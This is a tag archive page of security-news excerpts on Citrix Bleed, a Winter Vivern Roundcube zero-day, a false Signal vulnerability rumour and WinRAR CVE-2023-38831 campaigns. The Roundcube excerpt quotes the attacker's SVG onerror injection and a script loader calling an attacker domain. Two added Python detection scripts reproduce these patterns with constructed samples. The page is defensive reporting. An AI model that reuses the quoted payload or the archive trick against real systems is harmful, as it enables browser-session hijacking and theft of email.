Tag Archive for: Vulnerability

“This vulnerability is now under mass exploitation.” Citrix Bleed bug bites hard


A vulnerability that allows attackers to bypass multifactor authentication and access enterprise networks using hardware sold by Citrix is under mass exploitation by ransomware hackers despite a patch being available for three weeks.

Citrix Bleed, the common name for the vulnerability, carries a severity rating of 9.4 out of a possible 10, a relatively high designation for a mere information-disclosure bug. The reason: the information disclosed can include session tokens, which the hardware assigns to devices that have already successfully provided credentials, including those providing MFA. The vulnerability, tracked as CVE-2023-4966 and residing in Citrix’s NetScaler Application Delivery Controller and NetScaler Gateway, has been under active exploitation since August. Citrix issued a patch on October 10. Because the leaked data is session tokens, installing the patch alone does not evict an attacker who has already captured one; Citrix’s remediation guidance therefore also calls for terminating all active sessions once the update is in place.

Repeat: This is not a drill

Attacks have only ramped up recently, prompting security researcher Kevin Beaumont on Saturday to declare: “This vulnerability is now under mass exploitation.” He went on to say, “From talking to multiple organizations, they are seeing widespread exploitation.”

He said that as of Saturday, he had found an estimated 20,000 instances of exploited Citrix devices where session tokens had been stolen. He said his estimate was based on running a honeypot of servers that masquerade as vulnerable NetScaler devices to track opportunistic attacks on the Internet. Beaumont then compared those results with other data, including some provided by Netflow and the Shodan search engine.

Meanwhile, GreyNoise, a security company that also deploys honeypots, was showing exploits for CVE-2023-4966 coming from 135 IP addresses when this post went live on Ars. That’s a 27-fold increase from the five IPs GreyNoise saw five days ago.

The most recent numbers available from security organization Shadowserver showed that there were roughly 5,500 unpatched devices. Beaumont has acknowledged that the estimate is at odds with his estimate…

Source…

New Cyberattack From Winter Vivern Exploits a Zero-Day Vulnerability in Roundcube Webmail


After reading the technical details about this zero-day that targeted governmental entities and a think tank in Europe and learning about the Winter Vivern threat actor, get tips on mitigating this cybersecurity attack.

ESET researcher Matthieu Faou has exposed a new cyberattack from a cyberespionage threat actor known as Winter Vivern, whose interests align with Russia and Belarus. The attack focused on exploiting a zero-day vulnerability in Roundcube webmail, with the result being the ability to list folders and emails in Roundcube accounts and exfiltrate full emails to an attacker-controlled server. The cybersecurity company ESET noted the campaign has targeted governmental entities and a think tank in Europe. This cyberattack is no longer active.


Technical details about this cyberattack exploiting a 0day in Roundcube

The threat actor starts the attack by sending a specially crafted email message with the subject line “Get started in your Outlook” and coming from “team.management@outlook(.)com” (Figure A).

Figure A: Malicious email message sent by Winter Vivern to its targets. Image: ESET

At the end of the email, an SVG tag contains a base64-encoded malicious payload; it is hidden from the user but present in the HTML source code. Once decoded, the malicious content is:

<svg id="http://www.bing.com/news/x" xmlns="http://www.w3.org/2000/svg"> <image href="http://www.bing.com/news/x" onerror="eval(atob('<base64-encoded payload>'))" /></svg>

The image href points at a URL that does not return an image, so the load fails and the browser runs the onerror handler, which base64-decodes the payload and passes it to eval().

Decoding the payload in the onerror attribute results in a line of JavaScript code that will be executed in the victim’s browser in the context of the user’s Roundcube session:

var fe=document.createElement('script');
fe.src="https://recsecas[.]com/controlserver/checkupdate.js";
document.body.appendChild(fe);
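An added example, not code from ESET or from Roundcube: a small scanner that walks an HTML email body, records every on* event handler found inside an <svg> subtree, and decodes any base64 literal passed to atob() so the second-stage loader URL can be read and blocked. The sample email is constructed here from the wrapper and the three-line loader quoted above (the domain is kept defanged as in the article); scoping the check to SVG content mirrors the article's description and is an assumption of this example.

```python
import base64
import re
from html.parser import HTMLParser

# Constructed sample: the three-line loader shown above, base64-encoded and
# dropped into the same <svg><image onerror=...> wrapper the article quotes.
# Not taken from a real capture; the domain is kept defanged as in the article.
LOADER_JS = (
    "var fe=document.createElement('script');"
    'fe.src="https://recsecas[.]com/controlserver/checkupdate.js";'
    "document.body.appendChild(fe);"
)
SAMPLE_EMAIL_HTML = (
    "<html><body><p>Get started in your Outlook</p>"
    '<svg id="http://www.bing.com/news/x" xmlns="http://www.w3.org/2000/svg">'
    '<image href="http://www.bing.com/news/x" '
    "onerror=\"eval(atob('"
    + base64.b64encode(LOADER_JS.encode()).decode()
    + "'))\" /></svg></body></html>"
)

EVENT_HANDLER = re.compile(r"^on[a-z]+$", re.IGNORECASE)
ATOB_CALL = re.compile(r"atob\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")


class SvgHandlerScanner(HTMLParser):
    """Records every on* event-handler attribute found inside an <svg> subtree.

    html.parser lower-cases tag and attribute names and turns a self-closing
    <image ... /> into a start tag followed by an end tag, so only the nesting
    depth of <svg> itself needs tracking.
    """

    def __init__(self) -> None:
        super().__init__()
        self.svg_depth = 0
        self.findings: list[tuple[str, str, str]] = []

    def handle_starttag(self, tag, attrs):
        if tag == "svg":
            self.svg_depth += 1
        if self.svg_depth:
            for name, value in attrs:
                if EVENT_HANDLER.match(name):
                    self.findings.append((tag, name, value or ""))

    def handle_endtag(self, tag):
        if tag == "svg" and self.svg_depth:
            self.svg_depth -= 1


def decode_atob_payloads(handler_js: str) -> list[str]:
    """Decode every base64 literal passed to atob() in an event handler.

    Malformed blobs are skipped instead of raising: attacker input is not
    guaranteed to be valid base64, and one bad blob must not abort the scan.
    """
    decoded = []
    for blob in ATOB_CALL.findall(handler_js):
        try:
            decoded.append(base64.b64decode(blob, validate=True).decode("utf-8", "replace"))
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
    return decoded


def scan_email_html(html: str) -> list[dict]:
    """Return one record per event handler found inside SVG content, with any
    atob() payload decoded so the loader URL can be read and blocked."""
    scanner = SvgHandlerScanner()
    scanner.feed(html)
    scanner.close()
    return [
        {"tag": tag, "handler": name, "raw": value, "decoded": decode_atob_payloads(value)}
        for tag, name, value in scanner.findings
    ]


if __name__ == "__main__":
    for hit in scan_email_html(SAMPLE_EMAIL_HTML):
        print(f"<{hit['tag']} {hit['handler']}=...> decodes to:")
        for js in hit["decoded"]:
            print("   ", js)
```

Run against the constructed sample it reports one finding, the onerror handler on the <image> element, and decodes it back to the loader script; an on* handler outside an <svg> subtree is deliberately out of scope for this check.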

The JavaScript injection worked on fully patched Roundcube instances at the time of Faou’s discovery. The researcher could establish that this zero-day vulnerability was located in the server-side script rcube_washtml.php, which failed to ” … properly sanitize the malicious SVG…

Source…

Signal debunks online rumours of zero-day security vulnerability


Over the weekend rumours circulated on social networks of an unpatched security hole in the Signal messaging app that could allow a remote hacker to seize control of your smartphone.

The rumours, which rapidly spread further than the cybersecurity community into the wider public, claimed that the Signal encrypted messaging app contained a flaw related to its “Generate Link Previews” feature that could be exploited by hackers.

As someone once said, a lie can travel halfway around the world before the truth has got its boots on. And the situation is even worse in the 21st century, where anyone has the power to post a claim on Twitter, and watch it be retweeted and reshared thousands and thousands of times before anyone takes the time to ask a difficult question.

Some people did bother to respond to the rumours, asking for more details or a source that would confirm there was an issue. Which seems quite reasonable. After all, an encrypted messaging app like Signal is used by privacy-conscious folks who want to keep their communications secret.

However, in the threads I saw online, anyone asking for more details of the so-called vulnerability was fobbed off with “I heard it from a trusted source” or vague references to unnamed individuals within the US government.

In short, there were no real details of a zero-day vulnerability having been found in Signal at all.

And the idea that the link preview feature of Signal might be linked to the alleged vulnerability seemed unlikely.

Although it’s true that in the past other messaging apps have been found to reveal a user’s location through preview links, it isn’t the case with Signal.

Signal generates link previews (when the feature is enabled) before the link is sent to the other Signal user – not after.

In other words, disabling “link previews” in Signal (the advice being given in the erroneous warnings posted on social media) only prevents creation of link previews on your device; you are still able to receive them from others.

Earlier today, Signal posted a message on Twitter stating that it had seen no evidence that the vulnerability was real.

It went on to say that it had “checked with people across US Government, since the copy-paste report…

Source…

Pro-Russian Hackers Exploiting Recent WinRAR Vulnerability in New Campaign


Oct 16, 2023, Newsroom, Vulnerability / Hacking


Pro-Russian hacking groups have exploited a recently disclosed security vulnerability in the WinRAR archiving utility as part of a phishing campaign designed to harvest credentials from compromised systems.

“The attack involves the use of malicious archive files that exploit the recently discovered vulnerability affecting the WinRAR compression software versions prior to 6.23 and traced as CVE-2023-38831,” Cluster25 said in a report published last week.

The archive contains a booby-trapped PDF file that, when clicked, causes a Windows Batch script to be executed, which launches PowerShell commands to open a reverse shell that gives the attacker remote access to the targeted host.

Also deployed is a PowerShell script that steals data, including login credentials, from the Google Chrome and Microsoft Edge browsers. The captured information is exfiltrated via a legitimate web service webhook[.]site.


CVE-2023-38831 refers to a high-severity flaw in WinRAR that allows attackers to execute arbitrary code upon attempting to view a benign file within a ZIP archive. Findings from Group-IB in August 2023 disclosed that the bug had been weaponized as a zero-day since April 2023 in attacks targeting traders.
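An added example, not code from Cluster25, Group-IB or WinRAR: a static check over a ZIP's central directory for the archive layout associated with CVE-2023-38831, a top-level decoy document alongside a directory whose name is the decoy's name plus trailing whitespace, holding an entry with an executable suffix. Nothing is extracted. The two archives are constructed in memory for this example (the "script" inside is an inert echo), and the suffix list is a heuristic chosen here.

```python
import io
import zipfile

# Suffixes a shell would run as a program or script; a heuristic list chosen
# for this example, extend to taste.
EXECUTABLE_SUFFIXES = (".cmd", ".bat", ".vbs", ".vbe", ".js", ".jse", ".wsf",
                       ".ps1", ".exe", ".scr", ".lnk")

# Constructed samples (not real malware). The first mirrors the layout the
# article describes: a decoy document, a directory named like the decoy but
# with a trailing space, and a script inside whose name also carries the
# trailing space. The script body is an inert echo.
CONSTRUCTED_MALICIOUS = {
    "Trading-report.pdf": "%PDF-1.4 decoy, not a real document",
    "Trading-report.pdf /Trading-report.pdf .cmd": "@echo constructed sample, does nothing",
}
CONSTRUCTED_BENIGN = {
    "Trading-report.pdf": "%PDF-1.4 decoy, not a real document",
    "tools/cleanup.cmd": "@echo a script in a normally named folder is not the pattern",
}


def build_zip(entries: dict[str, str]) -> bytes:
    """Build an in-memory ZIP from {archive path: text content}."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, content in entries.items():
            zf.writestr(name, content)
    return buf.getvalue()


def find_cve_2023_38831_pattern(zip_bytes: bytes) -> list[tuple[str, str]]:
    """Return (decoy file, executable entry) pairs matching the WinRAR bug layout.

    The check: a top-level file F exists, a top-level directory whose name is F
    plus trailing whitespace also exists, and that directory holds an entry
    with an executable suffix. Entry names are read as stored in the central
    directory; no file is extracted or opened.
    """
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        names = zf.namelist()

    top_level_files = {n for n in names if "/" not in n}
    hits = []
    for name in names:
        top_dir, sep, rest = name.partition("/")
        if not sep or not rest or rest.endswith("/"):
            continue  # top-level file, or a bare directory entry
        decoy = top_dir.rstrip()
        if decoy == top_dir or decoy not in top_level_files:
            continue  # directory name is not "<existing file> + whitespace"
        leaf = rest.rsplit("/", 1)[-1]
        if leaf.lower().endswith(EXECUTABLE_SUFFIXES):
            hits.append((decoy, name))
    return hits


if __name__ == "__main__":
    for label, entries in (("malicious", CONSTRUCTED_MALICIOUS), ("benign", CONSTRUCTED_BENIGN)):
        print(label, "->", find_cve_2023_38831_pattern(build_zip(entries)))
```

The whitespace-padded directory name is the tell: ordinary archivers do not produce a folder named "Report.pdf " next to a file named "Report.pdf", so the check has few false positives, and because it only reads entry names it is safe to run on untrusted archives at a mail gateway.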

The development comes as Google-owned Mandiant charted Russian nation-state actor APT29’s “rapidly evolving” phishing operations targeting diplomatic entities amid an uptick in tempo and an emphasis on Ukraine in the first half of 2023.

The substantial changes in APT29’s tooling and tradecraft are “likely designed to support the increased frequency and scope of operations and hinder forensic analysis,” the company said, adding that the group has “used various infection chains simultaneously across different operations.”

Some of the notable changes include the use of compromised WordPress sites to host first-stage payloads as well as additional obfuscation and anti-analysis components.

APT29, which has also been linked to cloud-focused exploitation, is one of the many activity clusters originating from Russia that have singled out Ukraine following the onset of the war early last year.

In July 2023, the Computer Emergency Response Team of Ukraine…

Source…